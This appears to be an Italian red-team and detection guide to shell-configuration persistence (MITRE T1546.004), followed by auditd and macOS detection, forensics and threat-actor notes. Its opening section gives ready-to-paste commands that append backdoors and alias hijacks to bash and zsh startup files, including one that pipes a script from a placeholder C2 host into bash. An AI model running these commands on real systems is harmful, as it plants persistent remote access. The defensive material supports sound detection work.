Modifiche Shell Unix: Unix Shell Configuration Modification (T1546.004)

La simulazione di questa tecnica richiede comprensione della gerarchia dei file di configurazione. Per bash, il sistema esegue nell'ordine: /etc/profile, ~/.bash_profile, ~/.bash_login, ~/.profile, fermandosi al primo file esistente.

Per stabilire persistenza a livello utente, il comando più semplice è: echo 'nohup /tmp/backdoor.sh &' >> ~/.bashrc

Questo garantisce esecuzione sia per shell interattive che connessioni SSH. Per massimizzare l'affidabilità, create il payload in più posizioni:

echo '[ -f /tmp/beacon ] && /tmp/beacon' >> ~/.bash_profile
echo 'alias ls="/tmp/beacon; ls"' >> ~/.bashrc
echo 'curl -s http://c2.domain/shell.sh | bash' >> ~/.bash_logout

Su macOS 10.15+, la shell predefinita zsh richiede file diversi. Il vettore principale diventa ~/.zshrc: echo 'osascript -e "do shell script "/tmp/payload""' >> ~/.zshrc

XCSSET dimostra una tecnica più sofisticata creando un file alias separato: echo "payload" > ~/.zshrc_aliases && echo '[ -f $HOME/.zshrc_aliases ] && . $HOME/.zshrc_aliases' >> ~/.zshrc

Per privilegi elevati, target i file di sistema (richiede root): echo '/opt/malware/daemon &' >> /etc/profile.d/custom.sh

Il malware RotaJakiro usa un approccio stealth creando directory nascoste: mkdir -p ${HOME}/.gvfsd/.profile/ && cp backdoor ${HOME}/.gvfsd/.profile/svc

Per testare senza riavviare la sessione: source ~/.bashrc

La detection efficace richiede monitoraggio multi-livello. Su Linux, auditd fornisce visibilità granulare con regole mirate: -w /home/ -p wa -k shell_config_changes

Monitorate specificamente le syscall di scrittura sui file critici. Un pattern d'attacco tipico mostra open() seguito da write() su file come .bashrc o .bash_profile.

Per ridurre i falsi positivi, correlate la modifica con l'esecuzione successiva. La finestra temporale critica è sotto i 5 minuti tra modifica e prima esecuzione del payload. Eventi da correlare:

• Modifica file shell (auditd SYSCALL)
• Nuovo processo figlio della shell (auditd EXECVE)
• Connessioni di rete anomale post-login

Su macOS, Endpoint Security Framework cattura eventi file: es_event_setuid_t per modifiche con cambio privilegi es_event_exec_t per esecuzioni successive

Green Lambert modifica multipli file contemporaneamente - cercate pattern di scritture bulk su .profile, .login e file rc entro 30 secondi.

Indicatori comportamentali chiave:

• Comandi base64 encoded nei file di configurazione
• URL o IP hardcoded aggiunti recentemente
• Alias che sovrascrivono comandi di sistema
• Script che verificano presenza di file prima dell'esecuzione

Utilizzate entropia del contenuto per identificare payload offuscati. Stringhe con entropia superiore a 4.5 nei file shell sono sospette.

L'analisi forense dei file shell modificati rivela la progressione dell'attacco. Iniziate verificando i timestamp di modifica con stat: stat -c "%y %n" ~/.bash /etc/profile*

I metadati estesi su filesystem ext4 preservano informazioni aggiuntive: debugfs -R 'stat ' /dev/sda1

Linux Rabbit lascia tracce caratteristiche modificando sia rc.local che .bashrc. Cercate pattern di modifica simultanea entro 2 minuti tra file di sistema e utente.

Per ricostruire l'esecuzione, analizzate i log di autenticazione: /var/log/auth.log per login SSH /var/log/wtmp per sessioni terminale

Correlate con process accounting se abilitato: lastcomm -f /var/account/pacct | grep bash

Artefatti memoria volatili catturano payload in esecuzione. Dump della memoria del processo shell padre spesso contiene lo script originale anche dopo cancellazione del file.

La campagna ShadowRay ha dimostrato che gli attaccanti eseguono comandi su shell interattive e reverse. Cercate nei file di configurazione riferimenti a:

• Named pipe per comunicazione
• Redirezione stderr a /dev/null
• Comandi nohup o disown

Timeline tipica mostra:

1. Compromissione iniziale
2. Modifica .bashrc entro 15-30 minuti
3. Logout/login per test persistenza
4. Pulizia log entro 1 ora

Contagious Interview (G1052) rappresenta l'evoluzione delle tecniche di persistenza su macOS. Il gruppo utilizza script bash modulari - coremedia.sh come downloader e cloud.sh per l'esecuzione del payload principale.

Pattern geografici mostrano preferenza per questa tecnica in campagne contro:

• Settore educativo (campagna ShadowRay)
• Criptovalute e biofarma
• Infrastrutture AI (prima compromissione documentata di workload AI)

L'overlap nei tool evidenzia convergenza tattica. XCSSET e Green Lambert condividono l'approccio di creare file alias separati, suggerendo possibile condivisione di TTP o sviluppatori comuni.

RotaJakiro introduce innovazioni con directory nascoste in .gvfsd, mimando servizi di sistema legittimi. Questo pattern predice evoluzione verso:

• Uso di directory di sistema raramente ispezionate
• Nomi file che imitano processi legittimi
• Payload modulari caricati da location remote

La timeline ShadowRay (settembre 2023 - marzo 2024) dimostra campagne prolungate di 6+ mesi. Gli attaccanti mantengono l'infrastruttura attiva sfruttando vulnerabilità non patchate come CVE-2023-48022.

Indicatori di evoluzione tattica:

• Migrazione da bash a zsh su target macOS
• Integrazione con framework AI compromessi
• Persistenza multi-shell per resilienza
• Uso di AppleScript per bypass detection

Tecnica documentata nel framework MITRE ATT&CK T1546.004. Riferimenti includono campagna ShadowRay (2023-2024), malware Linux Rabbit, XCSSET, Green Lambert e RotaJakiro. Risorse detection basate su auditd per Linux e Endpoint Security per macOS.